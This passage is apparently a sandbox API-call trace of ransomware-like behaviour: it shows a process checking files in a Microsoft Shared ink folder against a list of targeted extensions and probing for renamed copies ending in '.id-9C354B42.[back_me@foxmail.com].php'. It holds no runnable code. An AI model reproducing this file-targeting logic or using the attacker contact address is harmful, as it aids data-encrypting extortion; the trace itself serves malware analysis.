4 [0039.770] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.770] lstrlenW (lpString=".rar") returned 4 [0039.770] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.770] lstrlenW (lpString=".bz2") returned 4 [0039.770] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.770] lstrlenW (lpString=".7z") returned 3 [0039.770] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.770] lstrlenW (lpString=".dbf") returned 4 [0039.770] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.770] lstrlenW (lpString=".1cd") returned 4 [0039.770] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61 [0039.770] lstrlenW (lpString=".jpg") returned 4 [0039.770] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.771] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.771] lstrlenW (lpString="ipsnld.xml") returned 10 [0039.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0039.771] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2626) returned 1 [0039.771] CloseHandle (hObject=0x1c0) returned 1 [0039.771] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml")) returned 0x20 [0039.771] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.771] lstrlenW (lpString=".doc") returned 4 [0039.771] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.771] lstrlenW (lpString=".docx") returned 5 [0039.771] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0039.771] lstrlenW (lpString=".pdf") returned 4 [0039.772] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.772] lstrlenW (lpString=".xls") returned 4 [0039.772] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.772] lstrlenW (lpString=".xlsx") returned 5 [0039.772] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0039.772] lstrlenW (lpString=".ppt") returned 4 [0039.772] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.772] lstrlenW (lpString=".zip") returned 4 [0039.772] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.772] lstrlenW (lpString=".rar") returned 4 [0039.772] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.772] lstrlenW (lpString=".bz2") returned 4 [0039.772] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.772] lstrlenW (lpString=".7z") returned 3 [0039.772] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.772] lstrlenW (lpString=".dbf") returned 4 [0039.772] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.772] lstrlenW (lpString=".1cd") returned 4 [0039.772] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.772] lstrlenW (lpString=".jpg") returned 4 [0039.772] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.772] lstrlenW (lpString=".doc") returned 4 [0039.772] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.772] lstrlenW (lpString=".docx") returned 5 [0039.772] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0039.772] lstrlenW (lpString=".pdf") returned 4 [0039.772] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.773] lstrlenW (lpString=".xls") returned 4 [0039.773] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.773] lstrlenW (lpString=".xlsx") returned 5 [0039.773] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0039.773] lstrlenW (lpString=".ppt") returned 4 [0039.773] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.773] lstrlenW (lpString=".zip") returned 4 [0039.773] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.773] lstrlenW (lpString=".rar") returned 4 [0039.773] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.773] lstrlenW (lpString=".bz2") returned 4 [0039.773] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.773] lstrlenW (lpString=".7z") returned 3 [0039.773] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.773] lstrlenW (lpString=".dbf") returned 4 [0039.773] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.773] lstrlenW (lpString=".1cd") returned 4 [0039.773] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0039.773] lstrlenW (lpString=".jpg") returned 4 [0039.773] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.773] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.773] lstrlenW (lpString="ipsnor.xml") returned 10 [0039.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0039.774] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2580) returned 1 [0039.774] CloseHandle (hObject=0x1c0) returned 1 [0039.774] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml")) returned 0x20 [0039.774] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.774] lstrlenW (lpString=".doc") returned 4 [0039.774] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.774] lstrlenW (lpString=".docx") returned 5 [0039.774] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0039.774] lstrlenW (lpString=".pdf") returned 4 [0039.774] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.774] lstrlenW (lpString=".xls") returned 4 [0039.774] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.774] lstrlenW (lpString=".xlsx") returned 5 [0039.774] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0039.774] lstrlenW (lpString=".ppt") returned 4 [0039.774] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.774] lstrlenW (lpString=".zip") returned 4 [0039.774] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.774] lstrlenW (lpString=".rar") returned 4 [0039.775] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.775] lstrlenW (lpString=".bz2") returned 4 [0039.775] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.775] lstrlenW (lpString=".7z") returned 3 [0039.775] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.775] lstrlenW (lpString=".dbf") returned 4 [0039.775] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.775] lstrlenW (lpString=".1cd") returned 4 [0039.775] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.775] lstrlenW (lpString=".jpg") returned 4 [0039.775] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.775] lstrlenW (lpString=".doc") returned 4 [0039.775] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.775] lstrlenW (lpString=".docx") returned 5 [0039.775] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0039.775] lstrlenW (lpString=".pdf") returned 4 [0039.775] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.775] lstrlenW (lpString=".xls") returned 4 [0039.775] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.775] lstrlenW (lpString=".xlsx") returned 5 [0039.775] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0039.775] lstrlenW (lpString=".ppt") returned 4 [0039.775] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.775] lstrlenW (lpString=".zip") returned 4 [0039.775] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.775] lstrlenW (lpString=".rar") returned 4 [0039.775] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.776] lstrlenW (lpString=".bz2") returned 4 [0039.776] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.776] lstrlenW (lpString=".7z") returned 3 [0039.776] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.776] lstrlenW (lpString=".dbf") returned 4 [0039.776] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.776] lstrlenW (lpString=".1cd") returned 4 [0039.776] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 61 [0039.776] lstrlenW (lpString=".jpg") returned 4 [0039.776] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.776] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.776] lstrlenW (lpString="ipsplk.xml") returned 10 [0039.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0039.777] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2600) returned 1 [0039.777] CloseHandle (hObject=0x1c0) returned 1 [0039.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml")) returned 0x20 [0039.777] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.777] lstrlenW (lpString=".doc") returned 4 [0039.777] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.777] lstrlenW (lpString=".docx") returned 5 [0039.777] lstrcmpiW (lpString1=".docx", lpString2="k.xml") returned -1 [0039.777] lstrlenW (lpString=".pdf") returned 4 [0039.777] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.777] lstrlenW (lpString=".xls") returned 4 [0039.777] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.778] lstrlenW (lpString=".xlsx") returned 5 [0039.778] lstrcmpiW (lpString1=".xlsx", lpString2="k.xml") returned -1 [0039.778] lstrlenW (lpString=".ppt") returned 4 [0039.778] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.778] lstrlenW (lpString=".zip") returned 4 [0039.778] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.778] lstrlenW (lpString=".rar") returned 4 [0039.778] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.778] lstrlenW (lpString=".bz2") returned 4 [0039.778] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.778] lstrlenW (lpString=".7z") returned 3 [0039.778] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.778] lstrlenW (lpString=".dbf") returned 4 [0039.778] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.778] lstrlenW (lpString=".1cd") returned 4 [0039.778] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.778] lstrlenW (lpString=".jpg") returned 4 [0039.778] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.778] lstrlenW (lpString=".doc") returned 4 [0039.778] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.778] lstrlenW (lpString=".docx") returned 5 [0039.778] lstrcmpiW (lpString1=".docx", lpString2="k.xml") returned -1 [0039.778] lstrlenW (lpString=".pdf") returned 4 [0039.778] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.778] lstrlenW (lpString=".xls") returned 4 [0039.778] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.778] lstrlenW (lpString=".xlsx") returned 5 [0039.779] lstrcmpiW (lpString1=".xlsx", lpString2="k.xml") returned -1 [0039.779] lstrlenW (lpString=".ppt") returned 4 [0039.779] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.779] lstrlenW (lpString=".zip") returned 4 [0039.779] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.779] lstrlenW (lpString=".rar") returned 4 [0039.779] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.779] lstrlenW (lpString=".bz2") returned 4 [0039.779] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.779] lstrlenW (lpString=".7z") returned 3 [0039.779] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.779] lstrlenW (lpString=".dbf") returned 4 [0039.779] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.779] lstrlenW (lpString=".1cd") returned 4 [0039.779] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0039.779] lstrlenW (lpString=".jpg") returned 4 [0039.779] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.779] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.779] lstrlenW (lpString="ipsptb.xml") returned 10 [0039.779] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0039.780] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2246) returned 1 [0039.780] CloseHandle (hObject=0x1c0) returned 1 [0039.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml")) returned 0x20 [0039.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.783] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.783] lstrlenW (lpString=".doc") returned 4 [0039.783] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.783] lstrlenW (lpString=".docx") returned 5 [0039.783] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0039.783] lstrlenW (lpString=".pdf") returned 4 [0039.783] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.783] lstrlenW (lpString=".xls") returned 4 [0039.783] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.783] lstrlenW (lpString=".xlsx") returned 5 [0039.783] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0039.783] lstrlenW (lpString=".ppt") returned 4 [0039.783] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.783] lstrlenW (lpString=".zip") returned 4 [0039.783] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.783] lstrlenW (lpString=".rar") returned 4 [0039.783] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.783] lstrlenW (lpString=".bz2") returned 4 [0039.783] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.783] lstrlenW (lpString=".7z") returned 3 [0039.783] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.783] lstrlenW (lpString=".dbf") returned 4 [0039.783] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.783] lstrlenW (lpString=".1cd") returned 4 [0039.783] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.784] lstrlenW (lpString=".jpg") returned 4 [0039.784] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.784] lstrlenW (lpString=".doc") returned 4 [0039.784] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.784] lstrlenW (lpString=".docx") returned 5 [0039.784] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0039.784] lstrlenW (lpString=".pdf") returned 4 [0039.784] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.784] lstrlenW (lpString=".xls") returned 4 [0039.784] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.784] lstrlenW (lpString=".xlsx") returned 5 [0039.784] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0039.784] lstrlenW (lpString=".ppt") returned 4 [0039.784] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.784] lstrlenW (lpString=".zip") returned 4 [0039.784] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.784] lstrlenW (lpString=".rar") returned 4 [0039.784] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.784] lstrlenW (lpString=".bz2") returned 4 [0039.784] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.784] lstrlenW (lpString=".7z") returned 3 [0039.784] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.784] lstrlenW (lpString=".dbf") returned 4 [0039.784] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.784] lstrlenW (lpString=".1cd") returned 4 [0039.784] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0039.785] lstrlenW (lpString=".jpg") returned 4 [0039.785] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.785] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.785] lstrlenW (lpString="ipsptg.xml") returned 10 [0039.785] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0039.785] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2240) returned 1 [0039.785] CloseHandle (hObject=0x1c0) returned 1 [0039.785] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml")) returned 0x20 [0039.785] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.785] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.786] lstrlenW (lpString=".doc") returned 4 [0039.786] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.786] lstrlenW (lpString=".docx") returned 5 [0039.786] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0039.786] lstrlenW (lpString=".pdf") returned 4 [0039.786] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.786] lstrlenW (lpString=".xls") returned 4 [0039.786] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.786] lstrlenW (lpString=".xlsx") returned 5 [0039.786] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0039.786] lstrlenW (lpString=".ppt") returned 4 [0039.786] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.786] lstrlenW (lpString=".zip") returned 4 